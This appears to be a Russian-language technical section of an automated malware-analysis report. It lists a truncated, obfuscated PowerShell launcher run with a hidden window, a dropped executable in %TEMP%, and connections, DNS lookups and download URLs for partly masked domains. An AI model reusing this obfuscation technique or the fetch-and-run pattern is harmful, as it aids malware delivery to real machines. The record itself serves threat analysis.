Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $sHElLiD[1]+$shelLiD[13]+'x')( "$( sET-vAriaBle 'ofS' '' ) "+ [stRINg]('0%116{94}82r25z74k65,83%9,75z70,78k65E71k80k4r106_65%80{10z115%65{70z103r72E77}65_74z80,31_0{103_78k66z25k3,76z80}80...
- %TEMP%\131.exe
- %TEMP%\131.exe
- %TEMP%\131.exe
- 'bo####calhenna.com':80
- 'fl###nghead.net':80
- 'ix###ine.com':80
- 'ix####sallison.com':80
- 'fl###nghead.net':443
- 'pk#.goog':80
- 'ma####yamithra.com':80
- http://www.bo####calhenna.com/Ejfm/
- http://www.fl###nghead.net/AoU7x/
- http://ix###ine.com/
- http://ix####sallison.com/
- http://www.ix####sallison.com/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.ma####yamithra.com/COQIZ/
- 'fl###nghead.net':443
- DNS ASK bo####calhenna.com
- DNS ASK fl###nghead.net
- DNS ASK ix###ine.com
- DNS ASK ix####sallison.com
- DNS ASK pk#.goog
- DNS ASK fe###nde.org
- DNS ASK ma####yamithra.com
- DNS ASK kk##s.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $sHElLiD[1]+$shelLiD[13]+'x')( "$( sET-vAriaBle 'ofS' '' ) "+ [stRINg]('0%116{94}82r25z74k65,83%9,75z70,78k65E71k80k4r106_65%80{10z115%65{70z103r72E77}65_74z80,31_0{103_78k66z25k3,76z80}80...' (со скрытым окном)